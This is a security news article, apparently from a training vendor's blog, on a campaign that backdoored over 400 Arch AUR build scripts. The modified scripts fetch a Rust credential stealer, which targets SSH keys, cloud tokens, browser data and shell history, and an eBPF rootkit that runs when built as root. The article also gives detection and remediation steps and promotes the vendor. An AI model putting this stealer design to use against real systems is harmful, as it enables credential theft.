400+ Arch Linux AUR Packages Backdoored With Rust Credential Stealer and eBPF Rootkit
Attackers hijacked more than 400 community-maintained Arch User Repository packages this week, silently modifying build scripts to drop a Rust-based credential harvester — and, when the build ran as root, an eBPF rootkit capable of hiding itself from every standard Linux detection tool.

Attackers Turned Trusted Build Scripts Into Credential Pipelines
More than 400 packages inside the Arch User Repository (AUR) were compromised this week, their PKGBUILD scripts rewritten to fetch and execute a malicious Rust binary during installation. The payload targets developer secrets: SSH keys, shell history, cloud provider tokens, browser-stored credentials, and dotfile-cached secrets. Any developer who built or rebuilt an affected package has to assume those assets are burned.
The AUR is community-maintained and sits deliberately outside Arch Linux's official, curated repositories. That separation limits the potential blast radius — but it also means each PKGBUILD is exactly what its maintainer last committed, with no automated signing or reproducibility verification enforced by default. The trust model is simple, and this week attackers found it exploitable at scale.
What the Malware Actually Does
The modified build scripts silently pull a Rust-compiled binary from an attacker-controlled host during the package build phase. Rust was an intentional choice: compiled Rust binaries are static, fast, and far less likely to trip AV heuristics trained on Python scripts or ELF-packed C payloads.
Once executing, the stealer sweeps a standard target list. SSH keys. Cloud credentials sitting in `~/.aws`, `~/.config/gcloud`, and similar paths. Browser profile data. Shell history files that frequently contain plaintext tokens passed as command-line arguments. The collection profile maps cleanly to access brokering — the goal appears to be selling or using whatever credentials unlock cloud tenants, private registries, or internal code repositories.
Then there is the privilege escalation path. The `makepkg` tool that drives AUR builds explicitly warns users against running it as root. Plenty of continuous integration pipelines and developer workstations ignore that warning. When the implant detects it is running with root privileges, it deploys a second stage: an eBPF-based rootkit that hides its own processes, files, and network sockets from userland tooling. Security teams relying on `ps`, `ls`, `ss`, or even many endpoint detection tools will see nothing unusual. eBPF rootkits are not a new concept — academic and proof-of-concept work on the technique goes back several years — but Linux endpoint detection and response coverage remains thin compared to Windows environments, and that gap is exactly what this implant exploits.
Who Is Behind This?
Attribution remains open. No vendor has publicly clustered this activity to a named threat group as of this writing. The tradecraft — mass package hijacking, commodity-looking Rust stealer, eBPF second stage gated on privilege — overlaps with both financially motivated supply-chain crews and developer-targeting campaigns run by clusters such as the one tracked as Contagious Interview by Mandiant and Famous Chollima by CrowdStrike, which have spent 2024 and 2025 pre-positioning inside developer environments. Overlap is not attribution. Any specific actor claim should be treated as low confidence until someone publishes corroborating infrastructure indicators or verified malware hashes.
What is clear is the capability: broad credential theft across Linux developer workstations with optional kernel-level persistence. The intent, based on what the stealer collects, looks like access brokering or follow-on intrusion into whatever those credentials open.
The Systemic Problem: Community Repositories Are a Soft Target
This is not the first AUR poisoning incident. It will not be the last. The AUR's value is inseparable from its openness — thousands of packages maintained by individual contributors, no central signing authority, no reproducible-build requirement, no SLA on malware response. That openness is a feature for the community and an attack surface for adversaries.
The Verizon 2024 Data Breach Investigations Report identified software supply-chain attacks as one of the fastest-growing initial access vectors, and package repository poisoning sits at the center of that trend. Developers are high-value targets: their machines hold keys to production systems, CI/CD credentials, and source code that, once accessed, can enable downstream attacks on customers or employers at scale.
Security awareness training that focuses exclusively on phishing emails leaves a critical gap here. Developers need threat-scenario training covering software supply chain risks — the Train2Secure developer-focused modules address exactly this class of attack, teaching engineers to verify build artifacts, audit PKGBUILD diffs, and recognize the signs of a compromised dependency before execution.
The Control That Failed
The proximate failure is package integrity verification — or rather, its absence. AUR packages carry no cryptographic guarantee that what you build today is what the maintainer published last month. No hash pinning. No reproducible-build enforcement. No automated behavioral scanning of PKGBUILD scripts before they execute on a user's machine. An attacker who gains write access to an AUR account — whether through credential stuffing, phishing the maintainer, or exploiting a weak password — can push malicious changes that propagate to every user who runs `yay` or `paru` without auditing the diff.
The secondary failure is privilege hygiene. Every security guide for AUR explicitly prohibits running `makepkg` as root. CI/CD pipelines that build AUR packages in root containers violate that guidance and hand the eBPF rootkit stage its ticket to kernel-level persistence. Build environments should run as unprivileged users, isolated in containers with minimal kernel capabilities, and monitored for unexpected outbound network connections at the firewall layer — not just the host layer.
Organizations should also audit their security standards and policy frameworks to confirm they explicitly address third-party and community package sources as part of their software supply chain risk management. Most enterprise policies cover commercial dependencies; far fewer address community repositories used by individual developers on corporate or personal workstations connected to corporate resources.
What Affected Users Must Do Now
The AUR maintainers are identifying and removing malicious packages, but that process takes time and the list is still growing. If you built or updated any AUR package this week, treat the following as mandatory:
- Pull the PKGBUILD diff for every package you installed this week and compare it against a known-good prior commit on the AUR web interface.
- Rotate all SSH keys, cloud provider tokens, API keys, and any credentials that could have been cached on the affected host.
- Check for unexpected outbound connections from your build environment using `ss -tnp` and network flow logs.
- Look for unfamiliar systemd units and, if root was involved, run `bpftool prog show` to list currently loaded eBPF programs and investigate anything unfamiliar.
- If you run AUR builds in CI, audit whether those pipelines execute as root and enforce unprivileged, ephemeral build containers going forward.
For teams managing multiple Linux developer endpoints, Train2Secure pricing tiers include organization-wide rollout options that cover developer-focused supply chain scenarios alongside standard security awareness content.
The capability demonstrated here is not exotic. The rootkit stage is aggressive but documented. The real story is how mundane the initial access was: a few hundred quietly modified text files in a repository most defenders have never audited.
How this attack could have been caught before execution
- Train developers to audit PKGBUILD diffs before running any AUR build, and to recognize the red flags of a supply-chain modification — remote binary fetches, obfuscated URLs, and unusual post-install hooks.
- Enforce a policy that CI/CD pipelines never build AUR packages as root, and validate that build environments use unprivileged, ephemeral containers with network egress restrictions.
- Run tabletop scenarios that simulate a poisoned internal or community package — most teams have never practiced this response and discover gaps only after real credential exposure.
Train2Secure's developer-focused security awareness modules include supply-chain attack simulations built for engineering teams, not just general staff.
Start free — no card requiredSources & further reading
Frequently asked questions
How do I know if I installed a compromised AUR package?
Check the PKGBUILD diff for every AUR package you built or updated this week by comparing the current script against a previous commit in the AUR web interface. Look for any lines that fetch and execute a remote binary during the build phase. Also run `bpftool prog show` to list loaded eBPF programs and inspect any unfamiliar entries.
Does running makepkg without root protect me from the eBPF rootkit stage?
Yes, partially. The eBPF rootkit stage only deploys when the build runs with root privileges. Running `makepkg` as an unprivileged user — which is the documented best practice — prevents the kernel-level persistence stage, though the credential stealer can still execute and exfiltrate developer secrets accessible to your user account.
Are official Arch Linux repository packages affected?
No. Only AUR packages were involved. The official Arch repositories are separately maintained and require package signing by Trusted Users, which provides a higher integrity baseline. The AUR operates on a different, community-trust model with no enforced signing requirement.
Should organizations ban AUR use on corporate or work-connected machines?
At minimum, organizations should establish a formal policy on community package repositories and require that any AUR package be reviewed and approved before installation. Build pipelines that consume AUR packages must run as unprivileged users inside isolated, ephemeral containers, and should include PKGBUILD diff review as a required step before any package update is applied.



